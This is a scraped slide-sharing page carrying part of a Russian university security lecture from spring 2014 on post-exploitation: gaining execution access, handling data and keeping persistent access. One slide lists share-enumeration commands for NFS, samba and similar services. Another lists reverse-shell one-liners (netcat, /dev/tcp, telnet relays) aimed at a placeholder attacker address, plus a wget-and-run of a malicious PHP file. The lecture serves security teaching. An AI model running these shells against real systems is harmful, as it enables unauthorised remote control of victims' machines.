Weitere ähnliche Inhalte
Ähnlich wie Безопасность весна 2014 лекция 7
Ähnlich wie Безопасность весна 2014 лекция 7 (20)
Безопасность весна 2014 лекция 7
- 2. Жизнь после марса
2
- доступ на выполнение .
- данные: хранение.
- данные: перехват.
- перманентный доступ.
- 5. Окружение
5
NFS:.
showmount –e target.
mount –o nolock –t nfs target:/path /local
rsync:.
rsync rsync://target/
ftp:.
ftp target
samba:.
smbclient –L target .
smbclient targetshare <password>
http:.
wget, curl, lynx, etc
netstat –anp|grep ESTABLISHED
- 8. доступ на выполнение
8
nc <attacker_ip> <port> -e /bin/bash
mknod backpipe p; nc <attacker_ip> <port> 0<backpipe |.
/bin/bash 1>backpipe
/bin/bash -i > /dev/tcp/<attacker_ip>/<port> 0<&1 2>&1
mknod backpipe p; telnet <attacker_ip> <port> 0<backpipe | /bin/
bash 1>backpipe
wget -O /tmp/bd.php <url_to_malicious_file> && php -f /tmp/bd.php
telnet <attacker_ip> <1st_port> | /bin/bash | telnet <attacker_ip>
<2nd_port>